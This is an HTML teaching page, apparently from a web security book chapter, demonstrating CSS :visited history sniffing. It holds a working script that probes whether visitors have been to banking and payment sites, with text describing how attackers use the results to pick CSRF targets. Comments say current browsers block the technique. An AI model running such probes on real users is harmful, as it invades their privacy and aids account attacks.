


Stealing History with JavaScript and CSS







Scenarios

An evil site or an XSS-compromised site may contain this history-checking script to see if you have been to sites that interest them. They will then use a CSRF attack to attempt to perform some action at that site as you, if you are still authenticated there via a cookie.

Note: The example only checks for a few sites, but it could check quite a number in a very short time, or use a communications request to fetch the list of sites or URLs it is interested in checking for.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Chapter 7 : Security - History</title>
<!-- Both external resources below are fetched over plain http:, so anyone on the
     network path could substitute the stylesheet or utilities.js (which supplies
     the getStyle() helper the script depends on). Serve them over https: where
     the host supports it. -->
<link rel="stylesheet" href="http://ajaxref.com/ch7/global.css" type="text/css" media="screen" />
<style type="text/css">
 
    /* checkHistory() relies on these two rules: an unvisited probe link is red,
       a visited one green, and the script reads the computed colour back to
       tell them apart. Current browsers report the :link colour to script even
       for visited links precisely to neutralise this technique, so the probe
       reports "not visited" for everything there. */
    a.stealhistory:link{color:#FF0000}
    a.stealhistory:visited{color:#00FF00}
</style>
<script src="http://ajaxref.com/ch7/utilities.js" type="text/javascript">
</script>
<script type="text/javascript">
 
 
 
function getHistoryLength()
{
    // Write the size of the session history (window.history.length) into the
    // #responseOutput element. Only the count is available to script here;
    // the output is a fixed label followed by the number.
    var entryCount = window.history.length;
    var target = document.getElementById("responseOutput");
    target.innerHTML = "<strong>Length of History through Javascript: </strong>" + entryCount;
}
 
function getHistory(stealhistorysites)
{
    // Write a header into #responseOutput, then append one line for every
    // entry of stealhistorysites that checkHistory() reports as visited.
    //
    // Every URL string is inserted through innerHTML without escaping. That is
    // harmless for the hard-coded list this page uses, but a list obtained from
    // anywhere else would be untrusted markup and would need escaping first.
    var output = document.getElementById("responseOutput");
    output.innerHTML = "<strong>Checking History through Javascript/CSS. </strong><br />";
    output.innerHTML += "<br /><strong>You have been to: </strong><br />";
    var index = 0;
    while (index < stealhistorysites.length)
    {
        var site = stealhistorysites[index];
        if (checkHistory(site))
        {
            output.innerHTML += site + "<br />";
        }
        index++;
    }
}
 
function checkHistory(url) 
{
    // CSS :visited history probe. A hidden <a class="stealhistory"> pointing
    // at url is added to the page, its computed colour is read back through
    // getStyle() (defined in utilities.js, not in this file), and the link is
    // removed again. The colour #00FF00 / rgb(0, 255, 0) is the :visited colour
    // set in the page's <style> block, so matching it is taken as "visited".
    //
    // Defender note: this only distinguishes anything in browsers that expose
    // the real :visited style to script. Current browsers deliberately return
    // the :link style here, so on them this function returns false for every
    // url regardless of history.
    var found = false;
    var link = document.createElement("a");
    link.className = "stealhistory";       
    link.href = url;       
    link.appendChild(document.createTextNode("stealhistory"));
    link.style.visibility = "hidden";              
    // The link must be in the document for :link/:visited to resolve.
    document.body.appendChild(link); 
          
    var color = getStyle(link,"color").toLowerCase();      
    // Clean up immediately so the probe leaves nothing behind in the page.
    document.body.removeChild(link);       
    if(color == "rgb(0, 255, 0)" || color == "#00ff00")           
        found = true;
    
    return found;
}
 
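window.onload = function() 
{ 
    /* The list of URLs to probe is hard-coded here; the original author notes it
       could instead be fetched remotely. Anything fetched remotely is untrusted
       input and must not be written into the page via innerHTML unescaped. */
    var stealhistorysites = [
        "http://www.google.com/",
        "http://ajaxref.com/ch7/history.html",
        "https://www.wellsfargo.com/",
        "http://www.bankofamerica.com/",
        "http://www.washingtonmutual.com/",
        "http://www.amazon.com/",
        "https://home.americanexpress.com/",
        "https://www.paypal.com/"
    ];
    
    // Wire the two buttons of <form name="requestForm"> to their handlers.
    var form = document.requestForm;
    form.checkHistoryLength.onclick = function() { getHistoryLength(); };
    form.checkVisited.onclick = function() { getHistory(stealhistorysites); };
    
    // Show the user which URLs will be probed. The markup is built as one
    // string and assigned once: appending with innerHTML += re-parses the
    // container each time, and after the opening <ul> has been auto-closed by
    // the first parse every <li> would land outside the list.
    var items = "";
    for (var n = 0; n < stealhistorysites.length; n++)
    {
        items += "<li>" + stealhistorysites[n] + "</li>";
    }
    var websites = document.getElementById("websites");
    websites.innerHTML = "<strong>We will check for history of the following sites:</strong><ul>" + items + "</ul><br />";
};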
</script>
 
</head>
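<body>
<div class="content">
<h1>Stealing History with JavaScript and CSS</h1><br />
<!-- The script reaches this form as document.requestForm and its buttons by
     name, so the name attributes below are part of the script's interface. -->
<form action="#" name="requestForm">
    <input type="button" value="Check History Length" name="checkHistoryLength" />
    <input type="button" value="Check for Visited URLs" name="checkVisited" />
</form>
</div>
 
<br />
<!-- Filled by the onload handler with the list of URLs the probe will test. -->
<div id="websites" class="response"></div>
<br /><br />
<!-- Filled by getHistoryLength() / getHistory() with the results. -->
<div id="responseOutput" class="response"></div>
 
<br /><br />
<div id="scenarios">
    <!-- h2 rather than h3: the only heading above this one is the page's h1,
         so h3 skipped a level. -->
    <h2>Scenarios</h2>
    <p>An evil site or an XSS compromised site may contain this history checking script to see if you have been to sites that interest them.  They will then use a CSRF to attempt to perform some action at that site as you if you are still authenticated via a cookie.</p>
    <p><em>Note:</em> The example only checks for a few sites but it could check quite a number in a very short time or use a communications request to fetch the list of sites or URLs it is interested in checking for.</p>
</div>
</body>
</html>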